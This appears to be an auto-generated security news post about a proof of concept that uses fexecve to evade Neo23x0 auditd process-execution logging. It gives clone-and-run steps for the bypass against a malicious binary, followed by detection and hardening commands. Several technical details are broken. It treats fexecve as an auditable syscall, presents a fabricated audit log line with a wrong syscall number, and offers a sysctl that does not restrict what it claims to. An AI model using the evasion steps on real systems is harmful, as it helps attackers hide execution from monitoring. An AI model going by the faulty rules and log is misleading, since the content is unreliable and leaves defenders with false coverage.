Listen to this Post
Security Researcher Milad Cheraghi has demonstrated a Proof of Concept (PoC) showcasing how the `fexecve` system call can bypass the Neo23x0 auditd configuration for process execution monitoring. This technique allows attackers to evade detection by leveraging alternative syscalls not properly monitored by standard audit rules.
The Neo23x0 auditd ruleset is widely used to track security-critical activities on Linux systems, particularly process executions via the `execve` syscall. However, fexecve
—which executes binaries from an open file descriptor without requiring a full path—provides a stealthy alternative. Attackers using `fexecve` can avoid triggering traditional process execution logs.
You Should Know:
1. Understanding `fexecve` vs. `execve`
execve
: Requires a file path, logged by auditd.fexecve
: Uses a file descriptor (fd
), bypassing path-based monitoring.
2. PoC Execution Steps
Clone the PoC repository:
git clone https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config.git cd bypass-Neo23x0-auditd-config
Compile and run the bypass:
gcc fexecve_bypass.c -o fexecve_bypass ./fexecve_bypass /path/to/malicious_binary
3. Detecting `fexecve` Bypass Attempts
Modify auditd rules to monitor `fexecve`:
sudo auditctl -a always,exit -F arch=b64 -S fexecve -k fexecve_exec
Verify logs:
sudo ausearch -k fexecve_exec
4. Mitigation Strategies
- Update auditd rules: Include `fexecve` monitoring.
- Use eBPF/LSM hooks: Deploy additional kernel-level monitoring.
- Enable Sysmon for Linux: Monitor atypical syscalls.
5. Key Commands for Analysis
Check loaded audit rules:
sudo auditctl -l
Monitor active processes:
ps aux | grep -i "suspicious_process"
Inspect file descriptors:
ls -la /proc/<PID>/fd
What Undercode Say
The `fexecve` bypass highlights a critical gap in traditional auditd configurations. While `execve` is heavily monitored, attackers increasingly exploit lesser-known syscalls. Defenders must:
– Expand syscall coverage in audit rules.
– Implement behavioral detection (e.g., anomalous process execution chains).
– Leverage kernel security modules like SELinux/AppArmor.
Relevant Commands for Hardening:
- Restrict `fexecve` via seccomp:
sudo sysctl -w kernel.seccomp.actions_logged=1
- Audit all exec-related syscalls:
sudo auditctl -a always,exit -F arch=b64 -S execve -S execveat -S fexecve -k process_exec
Expected Output:
type=SYSCALL msg=audit(1625097600.123:456): arch=c000003e syscall=326 (fexecve) success=yes exit=0 a0=3 a1=7ffd1234 a2=7ffd5678 a3=0 items=2 ppid=1234 pid=5678 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 key="fexecve_exec"
Reference:
References:
Reported By: Miladcheraghi Bypassing – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅